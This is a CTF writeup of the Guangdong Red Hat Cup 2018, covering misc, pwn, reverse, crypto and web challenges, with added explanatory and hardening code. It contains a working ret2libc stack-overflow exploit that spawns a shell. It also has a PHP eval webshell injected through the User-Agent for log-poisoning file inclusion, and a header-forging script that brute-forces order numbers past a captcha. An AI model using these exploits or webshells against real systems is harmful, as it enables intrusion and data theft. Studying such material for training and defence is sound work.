kir[A]'s 小黑屋

Guangdong Red Hat Cup 2018 writeup

Word count: 1.6k, reading time: 8 min
2018/05/02

Misc

Not Only Wireshark(solved)

http://static2.ichunqiu.com/icq/resources/fileupload/CTF/echunqiu/redhat/NotOnlyWireshark_ed63b63425ec3ed09470d8715b208293.zip?pass=null
hint: tshark
Open the capture and go straight to the HTTP traffic: there are many requests of the form name=xxx, each carrying a chunk of hex. Pull all the hex out in order. (Note that tr -d deletes a set of characters, not a string; the original pipeline only got away with it because the hex is uppercase and so never contains the lowercase letters a or e.)

# strings 123.pcapng | grep -oP 'name=\K[0-9A-F]+' | tr -d '\n' > flag

Convert the hex back to bytes (for example with xxd -r -p) and repair the zip file header.

The archive is password-protected; the password is: ?id=1128%23, found in the same capture:

# strings 123.pcapng| grep key
&GET /xss/example4.php?key=?id=1128%23 HTTP/1.1
Referer: http://10.211.55.15/xss/example4.php?key=?id=1128%23
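The extraction and header-repair steps above, as an added example that is not part of the original writeup: it parses the name= chunks from request lines only (a Referer header echoes the query string, as the key= output shows, so grepping every line would double-count), reassembles the bytes, checks the zip local file header signature, and decodes the header fields, including the general-purpose flag bit 0 that marks an encrypted entry and explains why a password was needed. The sample zip and the HTTP lines are constructed here; the assumption that the damage is confined to the 4 signature bytes is mine, the page does not say what was corrupted.

```python
import io
import re
import struct
import zipfile

ZIP_LOCAL_SIG = b"PK\x03\x04"
# Only the request line, so the Referer echo of the same query is not counted twice
REQ_RE = re.compile(r"^GET \S*[?&]name=([0-9A-Fa-f]+)")


def extract_hex(lines):
    """Concatenate the name= hex values from HTTP request lines, in capture order."""
    return "".join(m.group(1) for m in (REQ_RE.match(l) for l in lines) if m)


def naive_extract(lines):
    """What the grep pipeline on the page sees: every name= occurrence, headers included."""
    return re.findall(r"name=([0-9A-F]+)", "\n".join(lines))


def parse_local_header(data):
    """Decode the 30-byte zip local file header; None if the signature is wrong."""
    if len(data) < 30 or data[:4] != ZIP_LOCAL_SIG:
        return None
    (ver, flags, method, mtime, mdate, crc, csize, usize,
     nlen, xlen) = struct.unpack("<HHHHHIIIHH", data[4:30])
    return {
        "flags": flags,
        "encrypted": bool(flags & 1),   # bit 0: entry is password protected
        "method": method,               # 0 = stored, 8 = deflate
        "name": data[30:30 + nlen].decode("utf-8", "replace"),
        "crc": crc, "csize": csize, "usize": usize,
    }


def repair_local_signature(data):
    """Assumption: only the 4 signature bytes were damaged; rewrite them."""
    if data[:4] == ZIP_LOCAL_SIG:
        return data
    return ZIP_LOCAL_SIG + data[4:]


def recover(lines):
    """Full pipeline: request lines -> hex -> bytes -> header-repaired zip."""
    return repair_local_signature(bytes.fromhex(extract_hex(lines)))


def read_member(zip_bytes, name):
    return zipfile.ZipFile(io.BytesIO(zip_bytes)).read(name)


# ---- constructed sample data (not from the challenge) ----
def make_sample_zip():
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("flag.txt", "flag{constructed_sample}")
    return buf.getvalue()


def corrupt_signature(blob):
    return b"\x00\x00\x00\x00" + blob[4:]


def make_sample_requests(blob, chunk=16):
    """Split the blob into name= requests, each followed by a Referer echo."""
    h = blob.hex().upper()
    lines = []
    for i in range(0, len(h), chunk * 2):
        piece = h[i:i + chunk * 2]
        lines.append(f"GET /?name={piece} HTTP/1.1")
        lines.append(f"Referer: http://10.211.55.15/?name={piece}")
    return lines


if __name__ == "__main__":
    orig = make_sample_zip()
    rec = recover(make_sample_requests(corrupt_signature(orig)))
    print(parse_local_header(rec), read_member(rec, "flag.txt"))
```

If parse_local_header still returns None after the signature fix, the corruption is somewhere else in the header and the field decoder is the place to look next (a wrong name length or compression method is the usual suspect).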

Is this a web challenge?(solved)

http://static2.ichunqiu.com/icq/resources/fileupload/CTF/echunqiu/redhat/yunCMS_256035f22b73fdb1c90fd7503c4005ed.zip?pass=null
Scan the source with D盾 (D-Shield) straight away: it finds a JSP big shell and an obfuscated PHP one-liner.

Opening the JSP shell shows <Bad way. Get OUT. No000000000flag>, so the flag is probably not there.

Opening the obfuscated PHP one-liner instead, there is a hint below it:

You eventually found me
I am a hacker from Georgia
You are doing too much food at your upload
Used tshark to make traffic records?
Then you go to the traffic to find me

Open the capture 78466550-3fc1-11e8-9828-32001505e920.pcapng in the same directory and find the requests to companytplfiles.php: they carry a jpg and a gif, and the flag is in the gif, as a list of character codes.

>>> print(''.join([chr(x) for x in [102,108,97,103,123,83,48,50,50,121,52,111,114,114,53,125]]))
flag{S022y4orr5}

I heard you like manual brute-forcing(solved)

Letters inside flag{} are uppercase
http://static2.ichunqiu.com/icq/resources/fileupload/CTF/echunqiu/redhat/OS_038c9291c8039792d1aad140f6664671.iso?pass=null
From the hint this should be Manchester code, but the encoding in this challenge is not the standard one, so some guesswork is needed.

#coding:utf-8
a = '123654AAA678876303555111AAA77611A321'
# She now lives at block F5, street F5, building 07
f = '0'+bin(int('0x'+a,16))[2:]
print(f, len(f))

# Take the half-bit pairs: '01' -> 0, anything else -> 1 (not standard Manchester)
f2 = ''
for i in range(0,142,2):
    if f[i:i+2] == '01':
        f2 += '0'
    else:
        f2 += '1'
print(f2, len(f2))

# Reverse each 8-bit group (LSB first) and emit both nibbles as hex
flag = ''
for i in range(0,71,8):
    tmp = f2[i:i+8][::-1]
    flag += hex(int(tmp[:4],2))[2:]
    flag += hex(int(tmp[4:],2))[2:]
print(flag.upper())
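For comparison with the ad-hoc mapping above, here is a strict decoder for standard Manchester code, as an added example that is not part of the original writeup. It handles both common conventions (IEEE 802.3, where a low-to-high pair 01 is a 1, and G.E. Thomas, where it is a 0), reports pairs with no mid-bit transition (00 and 11) instead of silently mapping them, and packs bits either MSB- or LSB-first. Run on the challenge string it reports invalid pairs, which is exactly how you notice the stream is not standard Manchester; the encoder and the b"flag{" sample exist only to round-trip the decoder.

```python
CONVENTIONS = {
    # IEEE 802.3: low-to-high transition (01) is a 1, high-to-low (10) is a 0
    "ieee": {"01": "1", "10": "0"},
    # G.E. Thomas: the opposite assignment
    "thomas": {"01": "0", "10": "1"},
}


def hex_to_bits(h: str) -> str:
    """Hex string -> bit string, keeping leading zeros (4 bits per nibble)."""
    return "".join(format(int(c, 16), "04b") for c in h)


def manchester_decode(halfbits: str, convention: str = "ieee"):
    """Decode a stream of half-bit pairs.

    Returns (data_bits, bad_pair_indexes). '00' and '11' have no mid-bit
    transition and are not valid Manchester symbols, so they are reported
    rather than guessed at."""
    if len(halfbits) % 2:
        raise ValueError("stream must contain an even number of half-bits")
    table = CONVENTIONS[convention]
    out, bad = [], []
    for i in range(0, len(halfbits), 2):
        pair = halfbits[i:i + 2]
        if pair in table:
            out.append(table[pair])
        else:
            bad.append(i // 2)
    return "".join(out), bad


def manchester_encode(data: bytes, convention: str = "ieee", lsb_first: bool = False) -> str:
    """Inverse of manchester_decode, used here only to round-trip the decoder."""
    inv = {v: k for k, v in CONVENTIONS[convention].items()}
    bits = ""
    for byte in data:
        b = format(byte, "08b")
        bits += b[::-1] if lsb_first else b
    return "".join(inv[bit] for bit in bits)


def bits_to_bytes(bits: str, lsb_first: bool = False) -> bytes:
    """Pack a bit string into bytes, optionally reading each byte LSB first."""
    if len(bits) % 8:
        raise ValueError("bit string is not byte aligned")
    out = bytearray()
    for i in range(0, len(bits), 8):
        chunk = bits[i:i + 8]
        out.append(int(chunk[::-1] if lsb_first else chunk, 2))
    return bytes(out)


def decode_to_bytes(halfbits: str, convention: str = "ieee", lsb_first: bool = False):
    bits, bad = manchester_decode(halfbits, convention)
    return bits_to_bytes(bits, lsb_first), bad


# The hex string from the script above; the strict decoder flags invalid pairs in it
CHALLENGE_HEX = "123654AAA678876303555111AAA77611A321"

if __name__ == "__main__":
    stream = hex_to_bits(CHALLENGE_HEX)
    bits, bad = manchester_decode(stream)
    print(len(stream), "half-bits,", len(bad), "pairs without a transition:", bad)
```

When a stream decodes cleanly under one convention but not the other, or only after dropping a bit of leading alignment, that is the signal to trust; when neither convention is clean, as here, the challenge is using its own mapping and the bad-pair positions tell you where the guesswork has to go.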

pwn

game server(solved)

nc 123.59.138.180 20000
http://static2.ichunqiu.com/icq/resources/fileupload/CTF/echunqiu/redhat/game_server_ccc0d7c007817105ab5b9d10c6f1c8b1.zip?pass=null

int sub_8048637()
{
  char s; // [esp+7h] [ebp-111h]
  char v2; // [esp+107h] [ebp-11h]
  size_t nbytes; // [esp+108h] [ebp-10h]
  char *v4; // [esp+10Ch] [ebp-Ch]

  puts("Welcome to my game server");
  puts("First, you need to tell me you name?");
  fgets(byte_804A180, 256, stdin);
  v4 = strrchr(byte_804A180, 10);
  if ( v4 )
    *v4 = 0;
  printf("Hello %s\n", byte_804A180);
  puts("What's you occupation?");
  fgets(byte_804A080, 256, stdin);
  v4 = strrchr(byte_804A080, 10);
  if ( v4 )
    *v4 = 0;
  printf("Well, my noble %s\n", byte_804A080);
  nbytes = snprintf(
    &s,
    0x100u,
    "Our %s is a noble %s. He is come from north and well change out would.",
    byte_804A180,
    byte_804A080);
  puts("Here is you introduce");
  puts(&s);
  puts("Do you want to edit you introduce by yourself?[Y/N]");
  v2 = getchar();
  getchar();
  if ( v2 == 89 )
    read(0, &s, nbytes); // stack overflow here: nbytes is snprintf's untruncated length, s is only 0x100 bytes
  return printf("name : %s\noccupation : %s\nintroduce : %s\n", byte_804A180, byte_804A080, &s);
}

The "edit your introduce" step at the end is a plain stack overflow. snprintf returns the length the formatted string would have had without truncation, not the number of bytes it actually wrote, so with a 255-byte name and occupation nbytes is well over 0x100 while s holds 256 bytes; read(0, &s, nbytes) then writes far past the buffer and over the saved return address. The binary only has NX enabled (no PIE, no canary), so the plan is: return into puts@plt to print a GOT entry, identify the matching libc from the leaked address, compute system and "/bin/sh" from it, and call system for a shell.

#coding:utf-8
from pwn import *
context(arch = 'i386', os = 'linux')
LOCAL = 0
remote_addr = '123.59.138.180'
remote_port = 20000

if LOCAL:
    p = process('./pwn2')
    libc = ELF('/lib/i386-linux-gnu/libc.so.6')
else:
    p = remote(remote_addr,remote_port)
    libc = ELF('./libc6-i386_2.23-0ubuntu10_amd64.so')

elf = ELF('./pwn2')

def foo(payload):
    # Long name/occupation push snprintf's return value (nbytes) far past the
    # 0x100-byte buffer, so the read() after 'Y' overflows the stack
    name = 255*b'A'
    p.sendafter(b'name?\n',name)
    noble = 255*b'1'
    p.sendafter(b'occupation?\n',noble)
    p.sendlineafter(b'[Y/N]\n',b'Y')
    p.send(payload)

put = elf.plt['puts']
junk = 277*b'A'   # s sits at ebp-0x111, saved eip at ebp+4: 0x111 + 4 = 277
# stage 1: puts(puts@got) to leak libc, then return into sub_8048637 for a second round
payload =junk + p32(put) + p32(0x08048637) + p32(elf.got['puts'])
foo(payload)
p_addr =u32(p.recvuntil(b'\xf7')[-4:])   # libc pointer is little-endian, 0xf7 is its top byte
success(hex(p_addr))
libc.address = p_addr - libc.symbols['puts']
success(hex(libc.address))
success(hex(libc.symbols['system']))
# stage 2: system("/bin/sh"); the return address after system is irrelevant
payload2 = junk + p32(libc.symbols['system']) + p32(0) + p32(next(libc.search(b'/bin/sh')))
foo(payload2)
p.interactive()
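To make the bug and the frame layout concrete without a target binary, here is an offline model of the overflow and of the two ROP frames, as an added example that is not part of the original exploit. The buffer size, the ebp-0x111 offset and the format string come from the decompilation above; the PLT/GOT addresses in the usage block are placeholders, not the real ones, and the hardened_read_len function is the fix the program should have had (clamp the read to the buffer, since snprintf's return value is not a byte count).

```python
import struct

# Figures taken from the decompiled sub_8048637 above
BUF_SIZE = 0x100                 # snprintf(&s, 0x100u, ...) and sizeof(s)
S_OFFSET = 0x111                 # char s at [ebp-0x111]
RET_OFFSET = S_OFFSET + 4        # saved eip at ebp+4 -> 277 bytes of padding
FMT = "Our %s is a noble %s. He is come from north and well change out would."


def snprintf_return(name: str, occupation: str) -> int:
    """C snprintf returns the length the *untruncated* output would have had.
    That is the value the binary stores in nbytes."""
    return len(FMT % (name, occupation))


def overflow_bytes(name: str, occupation: str) -> int:
    """How far read(0, &s, nbytes) can write past the end of s."""
    return max(0, snprintf_return(name, occupation) - BUF_SIZE)


def hardened_read_len(name: str, occupation: str) -> int:
    """What the read length should have been: clamped to the buffer."""
    return min(snprintf_return(name, occupation), BUF_SIZE - 1)


def leak_payload(puts_plt: int, reenter: int, puts_got: int) -> bytes:
    """Stage 1 frame: eip -> puts@plt, puts' return -> sub_8048637, arg -> puts@got."""
    return b"A" * RET_OFFSET + struct.pack("<III", puts_plt, reenter, puts_got)


def shell_payload(system_addr: int, binsh_addr: int) -> bytes:
    """Stage 2 frame: eip -> system, dummy return address, arg -> "/bin/sh"."""
    return b"A" * RET_OFFSET + struct.pack("<III", system_addr, 0, binsh_addr)


def payload_fits(payload: bytes, name: str, occupation: str) -> bool:
    """read() delivers at most nbytes, so the whole chain must fit inside it."""
    return len(payload) <= snprintf_return(name, occupation)


def parse_leak(stream: bytes) -> int:
    """Same idea as recvuntil(b'\\xf7')[-4:]: the libc pointer is written
    little-endian, so its high byte 0xf7 is the last byte puts() emits."""
    idx = stream.index(b"\xf7")
    return struct.unpack("<I", stream[idx - 3:idx + 1])[0]


def libc_base(leaked_puts: int, puts_offset: int) -> int:
    """Base = runtime address of puts - its offset inside the identified libc."""
    return leaked_puts - puts_offset


if __name__ == "__main__":
    name, occ = "A" * 255, "1" * 255
    print("nbytes =", snprintf_return(name, occ), "overflow =", overflow_bytes(name, occ))
    # placeholder addresses, not the challenge's
    pl = leak_payload(0x08048410, 0x08048637, 0x0804A018)
    print(len(pl), payload_fits(pl, name, occ))
```

The payload_fits check is the one worth keeping: with short inputs nbytes is smaller than the padding alone and read() silently delivers a truncated chain, which shows up as a crash in the wrong place rather than an obvious error.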

Shellcode Manager

nc 123.59.138.180 13579
http://static2.ichunqiu.com/icq/resources/fileupload/CTF/echunqiu/redhat/shellcode_manager_0cb5a25a8f7fd4d3b5a12b0bb19d8834.zip?pass=null

Starcraft RPG

nc 123.59.138.180 13799
http://static2.ichunqiu.com/icq/resources/fileupload/CTF/echunqiu/redhat/starcraft_rpg_507f28c1a20762caf02ffc693f6978eb.zip?pass=null

re

icm(solved)

http://static2.ichunqiu.com/icq/resources/fileupload/CTF/echunqiu/redhat/icm_49785d49972274eac2273fb2bc3a5704.zip?pass=null

wcm(solved)

http://static2.ichunqiu.com/icq/resources/fileupload/CTF/echunqiu/redhat/wcm_d46106eb128a18a826d1faab3cf60571.zip?pass=null

Explain

http://static2.ichunqiu.com/icq/resources/fileupload/CTF/echunqiu/redhat/explain_bbb5702a489a0c0eaac68e6a6fd7329b.zip?pass=null

ccm

http://static2.ichunqiu.com/icq/resources/fileupload/CTF/echunqiu/redhat/ccm_74cf0e74e3b38a20fefb73d81eb5f0b8.zip?pass=null

crypt

3dlight

nc 123.59.138.211 20000
http://static2.ichunqiu.com/icq/resources/fileupload/CTF/echunqiu/redhat/3dlight_8fe7455b6f72d04629763acf7a793b59.zip?pass=null

rsa system

nc 123.59.138.211 23333
http://static2.ichunqiu.com/icq/resources/fileupload/CTF/echunqiu/redhat/rsa_system_89ab28deea7b30d99a949f2220aac31b.zip?pass=null

advanced ecc

nc 123.59.138.211 34545
http://static2.ichunqiu.com/icq/resources/fileupload/CTF/echunqiu/redhat/advanced_ecc_a48db2b810bb655bf9e4992894cdbf06.zip?pass=null

web

simple upload(solved)

This time the site in front of you is very simple. Accept the challenge!
Upload a small JSP shell directly to get a shell.

shopping log(solved)

http://123.59.141.153/
或者 http://120.132.95.234/
First you have to edit the system hosts file (the script below talks to www.tmvb.com, so map that name to the challenge IP), then get past the various HTTP header checks, and finally you reach an order lookup system; following the hint, brute-force the order numbers from 9999 downward, solving the md5-prefix captcha for every attempt.

#coding:utf-8
import hashlib
import itertools
import re
import requests

def md5(x):
    return hashlib.md5(x.encode()).hexdigest()

def getcode(mdcode):
    # Captcha: find a 5-char [a-z0-9] string whose md5 starts with the 6 hex chars the page shows
    s3='qwertyuiopasdfghjklzxcvbnm1234567890'
    for combo in itertools.product(s3, repeat=5):
        s = ''.join(combo)
        if md5(s)[0:6]==mdcode:
            return s

url = 'http://www.tmvb.com/5a560e50e61b552d34480017c7877467info.php'
url2 = 'http://www.tmvb.com/api.php?action=report'
# Headers the site checks before letting you in (hosts file must point www.tmvb.com at the target)
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) '
           'Chrome/45.0.2454.85 Safari/537.36 115Browser/6.0.3','Connection': 'keep-alive',
           'Referer':'www.dww.com','Accept-Language': 'ja','X-Forward-For':'133.1.16.172',
           'Cookie':'PHPSESSID=48ja11agl6fbo52gsntfk4feq1'
}
# Order number: <input type="text" id="TxtTid" placeholder="enter the last four digits of the order number" style="margin-right: 30px;" />
# Captcha: <input type="text" id="code" placeholder="code" style="width:40px;" /><p>substr(md5(code),0,6) === '167d9f'</p>

n = 9999
while n > 0:
    r = requests.get(url=url,headers=headers)
    #print(r.text)
    vcode = re.findall(r"=== '(.{6})'",r.text)[0]
    print(vcode)
    vv = getcode(vcode)
    #print(vv , md5(vv))
    dat = {'TxtTid':str(n),'code':vv}
    r = requests.post(url=url2,headers=headers,data=dat)
    print(dat)
    print(r.text)
    if '"error":1' in r.text:
        continue          # captcha rejected: fetch a new one and retry the same order number
    if 'There\'s no such order' not in r.text:
        break             # anything other than "no such order" is a hit
    #input('go on~')
    n -= 1

guess id

http://123.59.134.192/
http://120.132.94.238/
hint: ID card numbers follow certain rules
hint2: AES256 is a great cipher; ECB mode is easy to understand

biubiubiu(solved)

This time the site in front of you looks complicated. Accept the challenge!
http://ff970e071ecc41dcb5f51c0ff0b8ac273cce9a8ac0d44936.game.ichunqiu.com/index.php?page=login.php
There is a file inclusion vulnerability in the page parameter.

Key code, send.php (it fetches a user-supplied URL with redirects followed and gopher:// permitted as a redirect protocol; that is not the route used below, but it is worth noting):

<?php
if (@$_POST['url']) {
    $url = @$_POST['url'];
    if(preg_match("/^http(s?):\/\/.+/", $url)){
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, True);
        curl_setopt($ch,CURLOPT_REDIR_PROTOCOLS,CURLPROTO_GOPHER|CURLPROTO_HTTP|CURLPROTO_HTTPS);
        curl_setopt($ch, CURLOPT_HEADER, 0);
        curl_exec($ch);
        curl_close($ch);
    }
}
?>

Database credentials, conn.php (note the empty password):

$db_host = 'mysql';
$db_name = 'user_admin';
$db_user = 'Dog';
$db_pwd = '';

user.sql

DROP TABLE IF EXISTS `admin`;
CREATE TABLE `admin` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `username` varchar(32) DEFAULT NULL,
  `password` varchar(43) DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8;

Approach: put a PHP one-liner in the User-Agent so that nginx writes it verbatim into access.log, then include that log through the page parameter.

curl http://b4249514f2884c21859174e65ddd2615d8f7f25d5a9947b1.game.ichunqiu.com/index.php --header "User-Agent:<?php eval(\$_POST['1'])?>"

Then connect with 菜刀 (China Chopper) to the included log:

http://b4249514f2884c21859174e65ddd2615d8f7f25d5a9947b1.game.ichunqiu.com/index.php?page=../../../var/log/nginx/access.log

The flag is in the database; read it with Chopper's built-in database feature, using the credentials from conn.php.
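The two halves of the log-poisoning chain above, modelled offline as an added example that is not part of the original writeup: why the ../../../ path reaches /var/log from the web root, what a containment check and allow-list look like beside the unchecked include, and why nginx's combined log format carries the PHP tag intact. The document root /var/www/html, the allow-list and the log lines are all assumptions constructed for the example; the page says nothing about the real paths beyond the include URL.

```python
import posixpath

WEB_ROOT = "/var/www/html"                 # assumed document root (not stated on the page)
ALLOWED_PAGES = {"login.php", "send.php"}  # assumed allow-list for the hardened version


def vulnerable_resolve(page: str, web_root: str = WEB_ROOT) -> str:
    """Model of include($_GET['page']) relative to the web root with no validation:
    '../' sequences are honoured, so the caller picks any readable file."""
    return posixpath.normpath(posixpath.join(web_root, page))


def safe_resolve(page: str, web_root: str = WEB_ROOT, allowed=ALLOWED_PAGES):
    """Hardened variant: exact allow-list first, then a containment check on the
    normalised path. Real code should also resolve symlinks (realpath)."""
    if page not in allowed:
        return None
    full = posixpath.normpath(posixpath.join(web_root, page))
    if not full.startswith(web_root.rstrip("/") + "/"):
        return None
    return full


PHP_STAGER = "<?php eval($_POST['1'])?>"   # the one-liner sent in the User-Agent above


def nginx_combined_line(ip: str, request: str, user_agent: str, referer: str = "-") -> str:
    """Constructed line in nginx's default 'combined' log format. The User-Agent is
    written verbatim, which is why a PHP tag in it survives into the file."""
    return (f'{ip} - - [02/May/2018:10:00:00 +0800] "{request}" 200 612 '
            f'"{referer}" "{user_agent}"')


def poisoned_lines(log_text: str):
    """1-based line numbers in an access.log that contain a PHP open tag: a cheap
    detection for poisoning attempts, and a check that your own stager landed."""
    return [i for i, line in enumerate(log_text.splitlines(), 1) if "<?php" in line]


# constructed sample log, not from the challenge
SAMPLE_LOG = "\n".join([
    nginx_combined_line("10.0.0.5", "GET /index.php?page=login.php HTTP/1.1", "Mozilla/5.0"),
    nginx_combined_line("10.0.0.9", "GET /index.php HTTP/1.1", PHP_STAGER),
    nginx_combined_line("10.0.0.9",
                        "GET /index.php?page=../../../var/log/nginx/access.log HTTP/1.1",
                        "curl/7.58.0"),
])

if __name__ == "__main__":
    traversal = "../../../var/log/nginx/access.log"
    print(vulnerable_resolve(traversal), safe_resolve(traversal))
    print(poisoned_lines(SAMPLE_LOG))
```

Three ../ from /var/www/html land at /, which is why that exact depth appears in the include URL; a different document root changes the count but not the technique. On the defensive side, the allow-list is what actually closes the hole; the containment check is there for the case where the include genuinely has to be dynamic.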
